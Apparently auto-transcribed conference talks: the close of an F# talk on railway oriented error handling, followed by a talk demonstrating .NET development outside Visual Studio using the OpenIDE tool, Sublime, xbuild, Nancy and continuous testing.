So we're creating a special type for the failure case, not using string anymore. So in the two-track model, the failure is no longer a string. It's now an error message type. All right, and that error message type is now a list of choices. So it could be a name not blank. It could be an email not blank. All right. One of the nice things about using the F sharp choices is that the choices can actually have data along with them. So it's not just an enum in the C sharp sense. It's more like inheritance, where each possible subclass can have data with it. So in this case, if the email doesn't match the regex for valid emails, you can actually say it's not valid. And here is the email that didn't work. All right, you can actually pass data along with it. And if I go down to my error message type, the email not valid choice has an email address that goes along with it. So later on when it comes time to generate the error messages, I know exactly what the email address that triggered the error was. So I can log it later on. I can give it back to the user and so on. So what you do is you start off with this error message type. And basically you keep adding things. Every time something goes wrong, you add a choice to this. All right. So maybe the user ID is not valid, or maybe the database user is not found, or maybe you've got a connection string error, a timeout, a concurrency error, authorization errors, SMTP errors. All these — everything that can go wrong. You start putting this big long list. So you think, oh, blimey, that's a lot of stuff. I have to put everything that could possibly go wrong in this list. And I say, yes, you do, because it's documentation for everything that can possibly go wrong. If you don't put it in this list, it means you've forgotten something. Right. So, you know, you don't have to have a special thing for email blank — you know, you could have a generic database error or you could have a generic invalid server error.
If you want to keep it generic, you can. The more specific you are, the better your logging can be and the more fine-grained your error handling can be. But that's up to you. But I personally think, you know, having 50 things that can go wrong is actually really good, because I now know that I've thought about everything that can go wrong in this particular use case. I have documentation for it. And what's great about this documentation is it's type safe, because this is a type. This is code. Right. This is not just a comment. This is code. So if I try and create a new kind of error that is not handled — you know, let's say I want a new validation, the customer ID must not be negative. Right. That's a value that's not on here. So if it tries to create a "customer ID is not negative" error, that's a compiler error, because it's not on this list. I have to put "customer ID is not negative" as a choice, and then my code will compile. Right. So, you might say, yes, it's annoying, but it's actually less annoying to think up front of everything that can go wrong. Yeah, question. Yes. Because like I said, you can put data inside. So for the email, you could just have an email error, and then specific individual email errors inside. Yeah, exactly. You can organize it. I'm deliberately making it very flat, but you could totally make it hierarchical if you want. And you could have different levels at different service boundaries. Within one level, you can be very fine-grained, like with a database. At the database service, you might have, you know, authentication error, timeout error, whatever, and that gets rolled up into a generic database error for the user interface or something. So yes, you can map between errors at service boundaries. Okay. What I also like about this is it triggers conversations about what errors there are, because when you're coding, typically you don't even know what these are when you're starting to code.
But as you code, you say, oh, what happens if the database times out? What happens if I get an authorization error? You put that in this list to make your code compile and then you go back to your product owner or your UI designer or whoever it is who's helping to manage the product, even if it's you. And you think, well, what do I show on the screen when I get a database authorization error? So it really forces good conversations with the rest of the team about how you handle errors, which I think is really valuable, because one of the problems, again, is you think of the happy path and you don't focus on designing for errors. And you might just say, okay, well, I'll just show a generic error message, but you know, maybe the ops team want to know that you've got an authorization error. Maybe that's useful for them. So maybe you'll handle that in a special way. Once you do this thing, we've lost the strings, right? Originally we had the error as a string — the failure case had a string. But now what we need to do is turn the error code into a string. So now we have this ugly, long-winded method. You know, if it's the name-not-blank case, then return the string "Name must not be blank". If it's the email-not-blank case, return the string "Email must not be blank", and so on. So again, that seems awfully long and tedious. But I actually think this is a good thing, counter-intuitively, because one thing is that all your error strings are in one place, right? You don't have them scattered throughout your code, like a lot of apps do. You don't have any strings in your code anywhere except this very, very end. So only at the very last step do you need to turn things into strings. And if you're doing unit tests, you don't need to. So it's really just for the user interface that you need to turn them into strings. And what's nice about this is you can use different strings for different purposes.
So if I'm logging it, I might log super fine detail about, you know, user authentication error with this connection string, whatever. And if I'm displaying on the user interface, the string that I return might be, you know, sorry, customer not found or something. So you have a lot of control over different error messages for different contexts. And finally, it makes translation trivial. I don't know if any of you have tried to localize an existing legacy system. But the first thing you have to do is find all your strings scattered around your code base and try and turn them into resource IDs. And, you know, it's a pain. In this model, all your strings are in one place, in the very last step before the UI. So it's a lot easier to translate. Yes. Is it an anti-pattern to override ToString on the choice type? So the question is, is it an anti-pattern to override ToString on the choice type? Yes. Because I think the translation should be context dependent. So what I'd probably do is use different functions. I'd have a convert-to-string in the UI context, a convert-to-string in the error logging context, a convert-to-string in the ops notification context or something. You know, different contexts might need different things. For example, in the ops logging context, I might not bother to log the validation errors. It's like, I don't care. But maybe I do, because maybe that's telling me that my UI has got a bug in it, or maybe it's too hard to use or something. I don't know, you know, or it's not doing client side validation. If you get these server side validation errors, that means my client's not validating properly. But the thing is, it's a choice. So let's review this. It's documentation of everything that can go wrong. It's type safe. It can't go out of date. It surfaces hidden requirements. It means your testing is now testing against error codes.
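A small Python sketch of the design just described: errors as a choice type whose cases can carry data, with all the strings produced in one place by context-dependent convert-to-string functions. The F# version uses a discriminated union; the class names and message strings below are my own stand-ins.

```python
from dataclasses import dataclass

# Each possible error is its own case, and a case can carry data --
# a rough Python stand-in for an F# choice type.
@dataclass
class NameMustNotBeBlank:
    pass

@dataclass
class EmailNotValid:
    email: str  # the offending address travels with the error

def to_ui_string(err):
    """All user-facing strings live here, at the very last step before the UI."""
    if isinstance(err, NameMustNotBeBlank):
        return "Name must not be blank"
    if isinstance(err, EmailNotValid):
        return f"'{err.email}' is not a valid email"
    return "Sorry, something went wrong"

def to_log_string(err):
    """A different, more detailed rendering for the ops log."""
    if isinstance(err, EmailNotValid):
        return f"VALIDATION EmailNotValid email={err.email!r}"
    return f"VALIDATION {type(err).__name__}"
```

Unit tests can now assert against the error cases themselves rather than matching display strings, and localization only has to touch the convert-to-string functions.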
So rather than testing, let's say I'm testing my validation logic, you know, I can say, I would expect that if I pass in an empty name that I get a name-must-not-be-blank error, rather than looking for a string called "name is not blank". So it makes my tests less brittle. And finally, it makes translations easier. So that's designing for errors. Let's look at parallel tracks now. So if we take our validation logic, here we have the name not blank, followed by the name has to be 50 characters, followed by the email not blank. Now in this model, they're in serial mode. So, you know, I submit my name, it's blank, I get an error. So I try again, and this time it's too long. And I try again. This time, you know, it'd be nice if I could run them all in parallel and get all the validation errors at the same time. So how do you do that? Well, what you want to do is you want to parallelize these switches. So what you do is you submit the input, you run them all, and then you combine the output. And if any of them have an error, the overall output is an error. And only if they're all successful is the overall output successful. Makes sense, yeah? So how do you actually do that? Well, it turns out you don't have to write complicated functions. You can actually write a function that just adds two things together. So if you can write a function that adds two things together and outputs a new thing, that will actually allow you to do everything. So what you generally do is write a simple add that says, again, if they're both successful, return a success; if either has a failure, return a failure. And the way you combine them then is you combine three of them by combining two of them, that gives you a new one, you combine those two, and that gives you a new one. So you can collapse a list of the switches into a single switch. All right? And that pattern is what you might call the monoid pattern. Okay? Anyone heard of monoids? Yes? A few people?
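That "add two switches together" idea can be sketched in Python like this — run both switches on the same input, succeed only if both succeed, and concatenate the failure lists otherwise. As before, the `Success`/`Failure` types (here with a list of errors) and the validator names are my own illustration of the monoid pattern described, not the talk's F#.

```python
from dataclasses import dataclass
from functools import reduce

@dataclass
class Success:
    value: object

@dataclass
class Failure:
    errors: list  # a list, so parallel failures can be concatenated

def plus(switch1, switch2):
    """Combine two switches 'in parallel': both must succeed,
    otherwise the failure lists are merged."""
    def combined(x):
        r1, r2 = switch1(x), switch2(x)
        if isinstance(r1, Success) and isinstance(r2, Success):
            return Success(x)
        errs = (r1.errors if isinstance(r1, Failure) else []) + \
               (r2.errors if isinstance(r2, Failure) else [])
        return Failure(errs)
    return combined

def name_not_blank(req):
    return Success(req) if req["name"] else Failure(["Name must not be blank"])

def email_not_blank(req):
    return Success(req) if req["email"] else Failure(["Email must not be blank"])

# Collapse a list of switches into a single switch: the monoid pattern.
validate = reduce(plus, [name_not_blank, email_not_blank])
```

Because `plus` takes two switches and returns a switch, a whole list of validators collapses down to one switch that reports every validation error at once.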
So I have a post called Monoids Without Tears, which might explain that. But anyway, one of the benefits of using monoids is that you can collapse lists of things down into one thing. And the thing that you get, the output, is the same kind of thing. So you've got a bunch of switches as the input, and you end up with one switch as the output. So again, you cannot tell what you did — this final switch is the result of combining the other switches. Right, domain events. So we've talked about error handling so far, but sometimes you don't have an error, you just want to notify somebody that something happened. So let's say your email address changed, you just want to notify somebody, or you just want to log something, right? So in this model, there's nothing saying that you can't put messages on the success track as well. So along with the objects that you process on this, you have a list of notifications, messages that you put on. So for example, in this case, I'm going to have, let's say, a user saved successfully event, or an email sent event, and I'm going to pass that on to say, oh, I just sent the user an email. You just put it on the success track rather than the failure track. So our success track now, not only does it have the entity, but it has a list of messages. All right, pretty straightforward. Okay, final joke. Why can't a train driver be electrocuted? Because he's not a conductor. All right, so I haven't got time to cover all the topics. Things I haven't covered are errors across service boundaries, like we were talking about — how fine-grained the errors are at different levels. How to do async. So everything I did here was synchronous, right? In reality, a real system would be asynchronous. You wouldn't be waiting around for the database to return. You wouldn't be waiting around for the SMTP server to return. Compensating transactions.
So if you write to the database, and then later on downstream you need to undo that, well, rather than trying to do a two-phase commit, you can do what's called a compensating transaction, an idea taken straight out of accounting. And things like logging. I haven't had a chance to talk about that, but I think it's pretty straightforward how it works. So just to summarize: you start with a two-track result, you use bind to turn functions into these two-track railway things, you glue them together with composition, and you make error cases first-class citizens. Now, what's the time? How much time left? Two minutes. Two minutes. Okay. There is a piece of example code on GitHub, which I can demonstrate, and I think I can just maybe spend one minute showing you that it's not totally fake. So here is the controller. I'll show you the C# controller first. So this is a typical C# controller. There is the original get method, and there is the get method with error handling. So there's this error, and then there's this error, and the whole thing's wrapped in a try-catch block and so on and so forth. And the F# controllers look like this. And there is the successful case, and there is the error handling case. So I've got some extra stuff in there, like logging and so on, which I didn't have in the original case. And you can actually make both cases look identical just by doing some renames. So I put in some no-ops; I just put in some aliases where, like, logging a failure doesn't do anything. So that's an example of the successful case, and that's an example of the failure case. So it is true that you can make the code look identical. In this example, I actually try to make the code look different just so that it's not too confusing, so I give them slightly different names. Right. Where are we? So I don't always have errors, but when I do, I use monads.
But I will suggest that you can actually use railway oriented programming instead. So there you go: railway oriented programming. The slides are available at my website, slash R-O-P. If you want help with F#, come and ask me. And there's the example code on GitHub. Thanks very much. Any questions before you all dash off? No? Come and ask me. Come and grab me. I'm around. Cheers. Thank you. Thank you.
When you build real world applications, you are not always on the "happy path". You must deal with validation, logging, network and service errors, and other annoyances. How do you manage all this within a functional paradigm, when you can't use exceptions, or do early returns, and when you have no stateful data? This talk will demonstrate a common approach to this challenge, using a fun and easy-to-understand "railway oriented programming" analogy. You'll come away with insight into a powerful technique that handles errors in an elegant way using a simple, self-documenting design.
10.5446/50641 (DOI)
Okay, so I think we're going to start here. I am happy to see so many of you chose to come here. At the end of my talk, you might think that I am a raving lunatic, but that's okay. So we're going to do something quite different from the usual way of working with .NET: we are going to look at how to work with .NET outside of Visual Studio. You can probably see from the OS that I'm running that this is not going to be the typical talk. So I'm just going to say we are not going to talk about MonoDevelop today. We are not going to talk about SharpDevelop, and we're not going to talk about Xamarin Studio. Those are all tools that you can use as substitutes for Visual Studio, but I'm not going to talk about writing .NET code in the typical Visual Studio kind of way. Those tools will enable you to work with .NET code in fairly much the same way that you do inside Visual Studio. What I'm going to do is take a different approach. A lot of the time when I see people picking up new technologies, like a few years back, the first time I saw people trying out Node, what happened was that this was a platform you were not familiar with at all. Well, you were familiar with JavaScript. But what you could do, you could pick up any text editor, you could jump in there, you could write like three lines of code, and then you jump to the terminal and you write node and the name of the file and you hit enter and stuff comes out. That is awesome. You went from trying a new thing, you used familiar tools, and you got feedback immediately. So that is the kind of approach I want with .NET too. So you can try to do this.
You can jump into the terminal, you can create a directory called myproject, you go in there, you do vim, space, myproject.cs, and you hit enter, and then you go read the specification for the Visual Studio project files, and after five minutes you're going to be back in Visual Studio, because that is an absolutely terrible experience. I'm not going to dive too much into why that is a terrible experience, but basically Microsoft felt that they should take all the problems in the world and fit them into one file. So if we're going to do .NET development outside of Visual Studio, we need to be able to handle that, because without that we won't get anywhere. So to kind of give you my background on why I ended up doing this, because I haven't been inside Visual Studio for the last two years: I was writing a tool called AutoTest.Net, and together with Greg Young we wrote a tool called Mighty Moose, or ContinuousTests. The responsibility of that tool was that whenever you change a file, it will pick up the changes from disk, it will figure out, okay, which projects should I build now, it will build the projects, it will go in and analyze the DLLs, figure out, okay, based on the changes that I just made, what tests could possibly be affected, and then it'll only run those tests. So that means what I have handled for me now is that as soon as the file changes on disk my stuff gets built and my tests get run. So we made the terrible mistake of thinking let's create a Visual Studio extension for this, and that's six months of my life that I'm never going to get back. What kept happening frequently is that I did something in the plug-in and broke Visual Studio; everything shut down so I couldn't fix it. So I would open up Notepad, of all things, imagine. I'd open up the thing, I'd change the file, and I would open up the standalone runner for ContinuousTests. So as soon as I saved the file in Notepad it starts running in the background, and then I could fix the bug.
Like if there was some compiler it'll show up, tell me the line, I'll go there, fix the stuff and go back. And that kind of made me think okay this could actually work. I can deal with this. So I decided to completely jump out and I want all of you when you watch me today forget everything you know about Visual Studio because when I jumped out I made a decision. Okay so I am going to start working in a plain text editor. I will experience pain. When I experience pain I will make a rational decision. Am I experiencing pain because I am an idiot? Which happened way too often or am I experiencing pain because there's a process here that I need to automate? And then I would want to drive the way I am working like that. Instead of thinking okay these are all the things I am used to using. Let me try and build Visual Studio inside of Vib which is not a good idea. So okay what did I end up with? I ended up with a small tool that is called OpenID. That will help me deal with a lot of the pain that I am seeing. So this is all of OpenID. It's a few files. You have a command line interface here. You have a code engine that's going to run in the background while you sit and fiddle with your code. You have an editor engine which is going to do basic integration with an editor. And this is what you get out of the box. That is pretty much nothing. That is all that is needed for you guys to be able to do something with it. So to jump right into it now this doesn't even support C sharp as of now. So let's fix that. So we have a command called package source list. So I have some packages. Let me install the package that is up here that is called C sharp. C sharp language plugin. That sounds fairly right. Sure actually. So now I have installed that. So let me jump at and I will create a test thingy. So for OpenID to initialize it's basically the same thing as a get. As would get you do get init to initialize a get repository and you do oi init with OpenID to initialize OpenID. 
And I tell it that I want to initialize, and I want to work with the language C#, which kind of tells you that you can work with other languages inside this tool too. I hit enter. When I do oi help now, I suddenly have a ton of commands. All of them come from this C# command. So what I just did gave me the possibility to, like we see here, add files into C# project files. I can delete files, add references, delete references, create new classes, fixtures, interfaces, create console applications and so on. And that's templated, so you can create whatever you want. So if I want to do anything in here now, I'll do oi create console source/myapp. Just to mention that this runs on OS X, Windows and Linux, because the platform is up to you guys, not the tool. So now I have my app thingy in here. I have a project file, a Program.cs and an AssemblyInfo file. So this is stuff we're fairly familiar with. So what I can do, I can go into Vim if I want to. I can edit this thing. Looks familiar. I can do Console.WriteLine("Hello, NDC"). Right. Okay, so right now I don't have continuous testing here to do my build. So what do I do? Well, Microsoft's MSBuild will build your project, and on Mono you have xbuild, which does the same thing; it has pretty much the same features, I think, only the output is slightly different. So I can do xbuild source/myapp and the project file, hit enter, and we see it compile nicely and it says zero errors, which is good. So at this point I have a debug folder, I have the executable, I can run it and I get stuff out. Okay, so this is one way of doing it. And if I was going to do it like this, it would drive me mad, because there's too much jumping around here. I don't want that. So let's close this and let's take a few steps back. So what do I want? Text editors are a religion. So for a tool to decide which text editor any of you should use would be crazy. So I want to choose the text editor. That's up to me.
I need a tool that I can extend. At some point in your career you become a stubborn mule. You have your ways of working, and that's how you're going to work. So when you sit with a tool you want to be driving. The tool should not tell you what to do. You know what you're going to do; you just want to fix it. So I want a tool that I can extend to do whatever I want to do, because that's how I work right now. And extending it, I also want to choose the language I extend it in. I don't want a tool to tell me "you're going to extend it in Python". I want to choose that. So I want to choose the editor, I want to be able to extend anything, and I want to be able to do that with any language. Sounds about fair, right? Let's see how that's going to work. So that was actually the purpose of OpenIDE when I started with it. That's where I wanted to get. So what we can do now, I can create a source/temp/ndc-demo project. Right now I'm running on a version of OpenIDE here with a few packages installed that I use. I'll put up some information on how to get the system set up just like this after the talk. But you'll see that I have a few more features. Like, first of all, when I do oi init C# right now, which means I want to start working with a C# project, I have extended the part of it that does the init. So it initialized OpenIDE and it created a profile, which kind of suggests that you can actually have several profiles in here. So you can have a profile, I can have a profile, and we can still work together. What it also did, it created a Sublime project, because I know that if I'm going to work with this now, I'm going to use Sublime. So I want a Sublime project. So now I can do this in OpenIDE: I can tell it, okay, fire up the editor. I've set Sublime as the default editor. So what it's going to do, it's going to fire up Sublime.
It's going to fire up ContinuousTests, because now I'm using the C# language extensions that are bundled with ContinuousTests. And in the background, it's going to fire up the OpenIDE environment. There's a couple of processes now running in the background, making sure that everything can communicate. So what we want to do now is create a console application again. So we do oi create console source/demo, and when I hit enter it's going to bring the file up in the editor. You see the green there? ContinuousTests built it in the background. Console.WriteLine. Now I can do something in here. And as soon as it goes green, I can jump in here and I'll have a bin/AutoTest folder with the demo.exe in it. And now I can get the output like that. Okay, so if I were to do something stupid like this, I could save it and now it goes red. So I can bring that up with a shortcut. I can see that it expected a semicolon. I hit enter, it goes back to the right place and I can save it. So now we have a fairly good workflow. Now when we get build errors we can navigate around and it feels a bit better. So what I'm going to do now, I'm going to add Nancy to this project, which is a lightweight web framework. As you can see, I don't use NuGet. You can use NuGet if you want to. I think that if I have so many dependencies in my project that I need a tool to manage them, I have other problems. So basically, this gives me Nancy, through a small extension for OpenIDE again. So I have Nancy now, so I need to reference it. From what we saw earlier, I could do some stuff from the command line. So if I did oi help C#, I could run reference now. But I don't want to jump out to the command line to do this stuff and type a lot of things. So again, there's an extension to OpenIDE that will let me, let me see here, C# editor create. And like I said, extensions are written in the language of your choice. This thing is written in Python.
It's about 160 lines of code, and it makes me able to do all the things that I can do in the terminal there, inside the editor. So what I can do now is fire up a shortcut, reference library Nancy, and reference library Nancy self host. So about now I should be able to just write the using statements there and it should not fail. No. I can't type. That's my biggest problem. And it's green, and that makes me kind of happy. So because I can't type, I am not going to type this. So now I put a Nancy self-host server in there, which basically means my console application is now going to turn into a small web server, and it's going to run on port 1234. To make any sense of this, I need a module, so I can do all that now in a new class. I'll put it in my Modules namespace, and I'm going to call it Greeter. Again, I'm not going to type this for you. Basically, all the extensions that I'm using inside here to put code in are also written as extensions to OpenIDE. So I can pull a Nancy module template in there. So I'm going to remove this and I'm going to update the constructor. And now basically I have a simple thing where, if you query on the root, it's going to return "hello template". So now I should be able to save this and see it fail. So now it's missing "using Nancy". That's something we could solve, right? However, I'm not going to solve it. And this is one of the things that I talked about before: there's good pain and there's bad pain. This is actually some of the pain that I want to be aware of, because, well, let's think about code stability. I know that code that doesn't change remains as stable as it is. Code that changes for a known reason is considered fairly stable, because you know what you're doing in there. My code changes for the reason that the domain changes. There's a change in the domain, I want to reflect this in my code, and I make the change. Third party libraries change for any reason.
So as soon as you update a third party library, there are going to be changes made to your code that you're not in control of. Meaning, if I have to add usings everywhere in my code for a third party library, I am making my code fairly unstable, because my whole code base is now going to change for a reason that I am not in control of. So if I limit the usage of these libraries to kind of an isolated place, I will be in a better place. So that was something I kind of learned the hard way, that I actually don't want that using there. You could extend OpenIDE to do that for you, but I want to feel that pain, because when I feel that pain, I'm doing something stupid. So basically now it's built, and we can go into bin/AutoTest and run the demo. Remember, we run it, it fires up the Nancy host, we can go over here, we can find this one and it says "hello template". Okay, that's cool. Now, like I said, I want to have this kind of pain driven. I didn't want to take the usual features. So what my pain is now, and this comes from me writing a continuous testing tool, is that every time I make a change here, I'm going to have to go to the terminal. So first I stop the server, I make a change, I save it, it compiles, I go back here, I start this thing, I go over here, I hit F5 and I can see this. Now, the human brain is fairly useless at context switching. So if you're trying to focus on a problem, get something done, and you constantly have to jump somewhere else to do a task that is related, your brain is going to suffer. It's going to take you a lot longer to understand the problem that you're working on, because you all the time have to jump to other places and get interrupted. So I don't want that. So basically, what I want now: okay, let's look at this. We have events. OpenIDE internally has a bunch of events which you can react to.
So if we go over here now and I save the code, we see that it spits out a lot of file change events from disk, but it also spits out this: ContinuousTests pushed out an event saying that AutoTest.Net finished its run, and there were zero build errors and zero test failures. I can use that. There's another event up here too that says AutoTest.Net run started. Okay, so let's do this. I'm going to create a reactive script inside OpenIDE that I'll call run-server. And the simplest way I can do this is just by using bash scripts, so I'm going to do sh. I get this thing up, and the way these scripts work is that first the tool calls the script to ask which events it reacts to. So the API for this whole thing is standard in and standard out. If your language supports standard in and standard out, you can use it to extend the tool. I can tell it now: if you see this event, tell me about it. Also, if you see this event, tell me about it. So what are we going to do? If the first parameter, meaning the event, is this, then... and this is why I like running on a Unix-based system, because I can do stuff like this: pick out the processes, find the one that is running demo.exe, take the output of that and print column number two. Column number two is the process ID. So take all the process IDs that you find and kill them. Okay, so now we killed anything running as that process, and we can write out "server stopped". And for the event where we built and there were no compile errors, we will do this: we just run the executable, bin/AutoTest/demo.exe. Okay, and if the reactive scripts print something and you don't tell it that it's supposed to be a command, everything is going to be put into the output listener. So there's a few sockets exposed from OpenIDE. One of them is the output listener. It's a plain text socket, so you can just telnet in there if you want to and see the output.
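The stop/start logic of that reactive script could be sketched in Python instead of bash. The event strings below are paraphrased from the AutoTest.Net events mentioned above, and starting and stopping the server is stubbed out with callbacks, so this is an illustration of the dispatch, not the real script.

```python
# A sketch of a reactive script's dispatch: one event line in, one action out.
# Stop the app when a build run starts; restart it only on a clean build.

def make_handler(start_server, stop_server):
    def handle(event_line):
        if "run started" in event_line:
            stop_server()
            return "server stopped"
        if "finished" in event_line and "0 build errors" in event_line:
            start_server()
            return "server started"
        return None  # ignore file-change noise and failed builds
    return handle

log = []
handle = make_handler(lambda: log.append("start"), lambda: log.append("stop"))
handle("autotest.net run started")
handle("autotest.net run finished: 0 build errors, 0 test failures")
# log is now ["stop", "start"]: the server bounced across the build.
```

In the real thing, the event lines would arrive on standard in and the returned strings would be written to standard out, matching the stdin/stdout API described above.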
So what's going to happen now is that if I save this thing, it's going to stop the server when the build starts and start the server when the build is finished. And I can go in here and I can hit F5. Okay, so now it's a bit better, because I can go in here and I can say "hello world", I can save it, and as soon as it finishes, I can refresh it, and it says "Hello Word", actually. And I can go to the browser. So this kind of takes away some of the pain that I would be feeling working with this code, because I want to have immediate feedback. So just to kind of show the purpose of this: like the old blacksmiths, they were working with metal, and their tools were made of metal. So naturally they would go back and start making their own tools, to adapt them to their own workflow. Now, we're developers. We write code. That's what we know how to do. So basically the foundation of being a developer is writing code. On top of that, you have all the things that make you a good developer. So your foundation is writing code; that we know how to do. Now, if I have a problem here, let's say, okay, I know that my team, we always define the GET routes like this. How do you fetch the URL out of this thing? Well, you find the line that starts with Get and then a quote, and then you look until you find another quote. Right? How long would it take you to create a parser that pulls that out? Not very long. So I'm going to show you here: there's a script here that I wrote that took me about 10 minutes. I'm just going to pull that package in and install query-server. Just make sure that it's running. So it's running. So what is that going to do? It looks like this. Again, it's Python, because I found it easy to write that in Python. So you can see some of the way you extend it here.
So basically, when I want to get the position in the editor and the content of the editor, I write to standard out: request editor get-caret. And then I read until I get end-of-conversation. The first line is going to be which file is being edited and which position I'm at, and the rest is going to be the contents of the buffer. So from that, I can parse out what's going on here, and I can do this. So I'm going to fire up the output listener again. So I can go here and I do Alt+R, and it tells me: is this the URL you want to query? Yes, sure, and I'll get "Hello Word" out there. Actually, I can correct the error now. So I can put an "l" there, I save, and as soon as it's up, I can do Alt+R and it queries the server. So okay, now I have a workflow that reminds me of something that I can work with. So let's move this on a bit. So what we have here now, we have a demo project. We're good developers; we don't want our business code inside this console application that is basically a REST interface. So we want to separate that out. So I'll do oi create library, and we want demo.core. Hit enter, we have a demo library, and now we can reference project demo.core. So dealing with those project file issues now is not all that bad, because we have that integrated in Sublime right now. So okay, so we have that. So now we want a handler for this thing. So we are going to do a new class, and I'm going to put it inside demo.core/greeters/Norwegian. Okay, let's try this. So we're going to say now that our greeter route is a nationality slash name. Okay, so I'm going to query this URL. I'm going to say that we want a Norwegian and we want to greet this guy. And still we get "Hello World", because that's what we asked for.
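The route-extraction trick described above (find the line starting with Get and a quote, read until the next quote) is about as small as parsers get. Here is a sketch of that part in Python; the C# sample it scans is made up to look like the Nancy module in the demo.

```python
# A sketch of the query-server's parsing step: scan the buffer for a Nancy
# route definition, a line beginning with Get[", and pull out the URL
# between the quotes.

def find_route(buffer_text):
    for line in buffer_text.splitlines():
        stripped = line.strip()
        if stripped.startswith('Get["'):
            start = stripped.index('"') + 1       # first quote after Get[
            end = stripped.index('"', start)      # matching closing quote
            return stripped[start:end]
    return None

module_source = '''
public class Greeter : NancyModule
{
    public Greeter()
    {
        Get["/{nationality}/{name}"] = parameters => "Hello";
    }
}
'''
# find_route(module_source) gives back "/{nationality}/{name}"
```

The real script also asks the editor for the caret position over stdin/stdout first, which is omitted here.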
Wait for it. There you are. That was what I was going to do. So since this is an enterprise language, we need an interface for absolutely everything. So we need an IGreeter. So I'm going to do a new interface, and we're going to call it IGreeter. Okay, there you are. And then there's a lot of refactoring things that I could have put in here. I haven't, and anyone can. I haven't felt that pain to be big enough yet. Sorry. So what I can do in here, I can say Greet, string, return... no, this is an interface, what am I doing? So: string Greet(string name). Sublime has this feature called implement interface that kind of looks like this. So I can say: if nationality is "no", then we are going to greet you in this way, return "Hi " plus name. And then if we have an interface, we need a new class, and we need a GreeterFactory. So in the greeter factory, we can have a list of IGreeters. And this is basically just to show you guys that you can write enterprise code in this thing. So don't be afraid. You can do SharePoint, I assume. I would never want to. I thought it was dead. No, that was TDD. Oh, sorry. So, Norwegian, and then we need a get thingy here. So it's going to return an IGreeter; it's going to be Get(string). And we have IntelliSense, but it's not called that in a text editor, it's called auto completion. For my own code this works fairly well, because it's just going to be like that. So I haven't built full IntelliSense. You could, using the tool, but again, I haven't felt the need for it. That was one of the things that I really thought I would have to have, but the pain is not that significant. Okay, so I'm going to return a greeter: FirstOrDefault. And actually, what I found is that before, I couldn't write two words without misspelling one. Now we can write three words. So if this thing greets this nationality, then we return it. And this is something that I will fix, because adding usings for System stuff, that is just annoying, but I didn't get around to that before this. So, System.Collections.Generic.
And we're going to need LINQ there, System.Linq, blah, blah, blah. So if I were to do the true enterprise thing, now I would have a GreeterFactoryProvider, but I am not going to do that. So okay, now we have something in here. We can go up to this greeter thingy, oops, wrong file. And here we can say what we are going to do, so, return... let's just get this straight. So I have a greeter now, which is a new GreeterFactory. And from my code, I want to do add-usings, which I've implemented. So I can do Get and pass it the nationality. And if the greeter is null, I will return that the greeting is "nationality not supported". And I get auto completion for stuff that isn't even typed. How cool is that? And if it's supported, we just ask the supported greeter how you're supposed to be greeted. So we have parameters.Name. What did I send into that thing? Okay, so if this works, I'm going to be amazed. It didn't. So it's telling me I need a reference to Microsoft.CSharp. Okay, if you say so. So I want to reference library... no, that was not what I was supposed to do. Let me just correct that. And actually, sometimes it's easier to just deal with this one by hand, because I didn't get the time to write the functionality for just pulling that right over. So I can just add it myself. You didn't see that. And we're green. So if I'm very lucky, I should be able to do Alt+R, and we get the greeting. So, okay, next thing. A lot of the time I find that even though we shouldn't like code generating code, sometimes you are going to write things that will need some scaffolding, especially in particular languages. And writing that code is just painful. I don't want to do that. So let's see what we can do in here. So let's say that we had the silly solution of saying, okay, I'm going to write a handler for each language and I'm going to type it up myself. It wouldn't be that stupid, but let's just imagine.
So I have a package here, a C# new-templates package, so I can install that; again, a small Python script that is just going to do some simple templating for us. And I can open it up here. Okay, so I can say this: I want to create a small template for a greeter. It says here I can template out the namespace and the item name. So we're going to use that. We can get all of that. I paste it in here. I say that instead of the namespace, I want the namespace placeholder, and instead of "no", we're going to put a couple of question marks, and the same here. Okay, so this is part of what I said, that everything should be extendable in here. So if I do oi help new (new was the C# command that came from the plugin I installed), now I've got a greeter inside of that, so you can extend the whole command hierarchy just the way you want. So I want to do Swedish, and I'm going to do the no-test TDD thing. I'm going to first say I want Swedish and I want to say hi to this guy. Hit enter, and it says nothing, because I need to listen for the output. So I try that again; it says "nationality not supported". Okay. So I go in here now, I do new greeter, I have Swedish, I say that you are "se", and you would probably write it something like this. So I save it, it starts the server, Alt+R, and I forgot... yeah, this is enterprise, so I need to find the factory and add it there. I'll save it, and this time it gives me the Swedish greeting. Okay, so now I can template up the system so that anything that makes me think about other things than the problem I'm trying to solve, I can just take away. I'm a blacksmith here. I'm just hammering out some tools, and as long as you limit the scope of the problem, the solution is usually very simple.
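The new-greeter templating described above boils down to placeholder substitution. Here is a toy Python version; the placeholder syntax, class layout and names are invented for the sketch, not taken from the actual OpenIDE template format.

```python
# A toy version of the new-class templating: a template with placeholders for
# the namespace and item name, filled in to produce the scaffolded C# file.
# Doubled braces render as literal braces in str.format.

TEMPLATE = """namespace {namespace}
{{
    public class {item_name} : IGreeter
    {{
        public bool Greets(string nationality) {{ return nationality == "??"; }}
        public string Greet(string name) {{ return "??" + name; }}
    }}
}}
"""

def render(namespace, item_name):
    return TEMPLATE.format(namespace=namespace, item_name=item_name)

code = render("Demo.Core.Greeters", "Swedish")
# code now contains "namespace Demo.Core.Greeters" and "class Swedish",
# with the ?? markers left for the developer to fill in ("se", "Hej ").
```

Wiring a script like this into the command hierarchy is what makes oi help new show the greeter entry.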
So instead of always thinking that for every problem I'm going to solve, I'm going to solve that problem for all the projects I'm ever going to work on, solve it just for the one you're working on right now. Because the generic solution is not going to solve the problem for any of the other projects, or this one. And I say that out of experience. I did that for 10 years. So, okay, now I can do the basic things here. The workflow we have right now reminds us very much of the continuous testing workflow, only we don't have any tests, and that's kind of where I wanted to go with this, because TDD is not dead, it's just misunderstood. Sometimes you do TDD, because some problems are really efficient to solve with TDD. Other times you don't use TDD, but you want the same workflow. You want to be able to just get instant feedback from your code. And with some small tricks, you should be able to do that. So regarding TDD, what can we do about that? Again, there's a small extension, which is already in here, that lets me do this. Okay, so I want to create a tested library, and I want that to be demo.tested. When I do that, I get two libraries, demo.tested and demo.tested.tests, and it references them together and such. Okay, so I also want a new tested class, and I want to call it... is that what I... one second... Tested, yeah. So, MyTested class, and it'll generate the class and the test fixture it's supposed to use. And sometimes Mono is not very happy, so it does things like this. No, no, that was actually me. Sometimes I'm an idiot and my system does stuff like this. Don't mind the idiot. So I have a test here: Assert.That a new MyTested... I might have broken everything. No, I didn't. Okay, so .Hello(), the always delightful example, is equal to "world". So we do it the TDD way: we save it and it dies. And you're happy that it dies; you figure out it was this line. Okay, missing method: public string Hello(). Naturally, it should not work the first 